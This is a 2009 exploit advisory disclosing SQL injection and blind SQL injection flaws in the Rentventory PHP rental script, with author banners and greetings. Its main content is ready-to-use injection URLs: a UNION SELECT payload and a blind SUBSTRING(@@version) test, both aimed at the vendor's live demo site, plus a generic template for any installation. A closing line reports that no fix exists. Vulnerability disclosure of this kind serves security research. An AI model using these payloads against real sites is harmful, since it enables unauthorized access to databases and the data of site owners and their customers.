Rentventory Multiple Remote SQL Injection Vulnerabilities

2009-07-02 22:33:18

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|


==============================================================================
[»] ~Fleck i love you :D hahaha
==============================================================================
[»] Rentventory PHP (SQL/Blind) Multiple Vulnerabilities
==============================================================================

[»] Script: [ Rentventory ]
[»] Language: [ PHP ]
[»] Download: [ http://www.rentventory.com/ ]
[»] Founder: [ Moudi or SixSo <[email protected]> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em man .... ]
[»] Team: [ EvilWay ]
[»] SiteWeb: [ Visit - www.opensc.ws ]
[»] Price: [ $39 ]

###########################################################################

===[ Exploit SQL ]===

[»] http://www.site.com/patch/?product=[SQL]&panel=rent%2Fselect_time

===[ LIVE DEMO ]===

[»] http://www.rentventory.com/demo/?product=null+union+select+1,2,version(),4,5,6,7,8,9,10,11,12&panel=rent%2Fselect_time

===[ Exploit BLIND SQL ]===

[»] http://www.site.com/patch/?product=[BLIND]&panel=rent%2Fselect_time

===[ LIVE DEMO ]===

[»] http://www.rentventory.com/demo/?product=1+AND+SUBSTRING(@@version,1,1)=5&panel=rent%2Fselect_time


Author: Moudi

###########################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.